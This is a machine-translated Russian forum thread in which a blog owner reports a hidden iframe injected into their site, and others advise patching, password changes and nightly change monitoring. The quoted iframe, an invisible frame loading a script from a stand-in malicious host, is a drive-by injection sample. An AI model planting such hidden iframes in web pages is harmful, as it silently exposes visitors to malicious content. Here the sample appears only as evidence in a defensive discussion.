Назад | Перейти на главную страницу

Мой сервер взламывают?

Возможный дубликат:
Мой сервер был взломан в АВАРИИ

Я получил эту странную страницу, которая, я уверен, была создана не мной:

<iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

Откуда это, черт возьми? Это вирус ??

Мой блог-сайт blog.domain.com был в порядке несколько недель назад. Но теперь, внезапно, когда я захожу в свой блог, он становится пустой страницей и отображается:

This is index.html

Кто-нибудь знает, как удалить его навсегда и предотвратить его повторное появление на моем сайте?

Я видел такие встроенные iframe раньше. Кто-то определенно захватил вашу страницу и встроил ссылку. Удалите все ссылки на него, которые вы можете найти, и смени ВСЕ свои пароли.

Хозяева Cheapo никогда не признают, что их взломали, поэтому я не ожидал от них особой помощи

Это Атака межсайтового скриптинга (XSS). Начните читать о них. Есть несколько отличных скринкастов / видео на эту тему.

Главное сейчас - не проявлять халатность. У вашего сайта есть слабое место, которое необходимо найти и исправить. Не вините в этом и свою хостинговую компанию; Скорее всего, вы ошиблись, выбрав плохой движок блога или не постоянно обновляя хороший движок с последними исправлениями безопасности или выпусками.

Также: вы, кажется, знаете только о «вирусах». Взлом сервера не имеет ничего общего с вирусами. Проблема в уязвимость. В старых версиях wordpress они есть - в последнее время очень плохая, которую вам обязательно нужно обновить до исправления. Возможно, вы захотите изучить автоматические обновления безопасности для вашей ОС, программы, которые будут отправлять вам по электронной почте список текущих уязвимостей на ваших серверах, и / или подписаться на сайты CVE, которые предупреждают вас обо всех последних проблемах программного обеспечения.

По крайней мере, если вы администрируете сервер / сайт Linux, подпишитесь на некоторые сайты администраторов Linux, которые публикуют достойные статьи, которые учат вас новым навыкам и предупреждают о новых проблемах. XSS существует уже давно.

В дополнение к предложениям Farseeker, следуйте всем инструкциям в этом:

Объявление службы сообщества Virus Alert


Для людей с ослабленным звуком вот текстовая версия сообщения.

Удалите файл index.html из каталога index. Возможно, ваш хост сначала переключил приоритет индекса ... с index.php (например) на index.html.

Поскольку другие уже достаточно подробно рассмотрели, что делать с вашей небольшой проблемой, и, конечно же, самым важным моментом является некоторое обучение, я не буду дублировать их усилия. Однако я добавлю, что вам необходимо следить за своим сайтом. Очевидно, что взлом мог произойти в любое время в течение нескольких недель, но вы не знали об этом.

Существует множество способов автоматического отслеживания изменений на сайте, и вам нужно будет выбрать метод, который будет работать с системой вашего хоста. На случай, если у вас возникли проблемы с идеями, я использую сценарий оболочки, запускаемый на локальном компьютере, чтобы каждую ночь делать следующее:

  • Зеркальное отображение всего сайта с помощью wget (rsync мне недоступен)
  • Вызовите сценарий Perl, который анализирует журнал, игнорируя выбранные элементы, такие как каталоги и файлы кеша, и создает список любых изменений. Если будут обнаружены какие-либо изменения, этот список будет отправлен мне по электронной почте.
  • Вызовите другой сценарий, который рекурсивно анализирует файлы .listing и удаляет все локальные файлы и каталоги, которые больше не существуют на сервере.
  • Переименуйте старые архивы сайта так, чтобы были сохранены предыдущие 9, и заархивируйте текущую версию.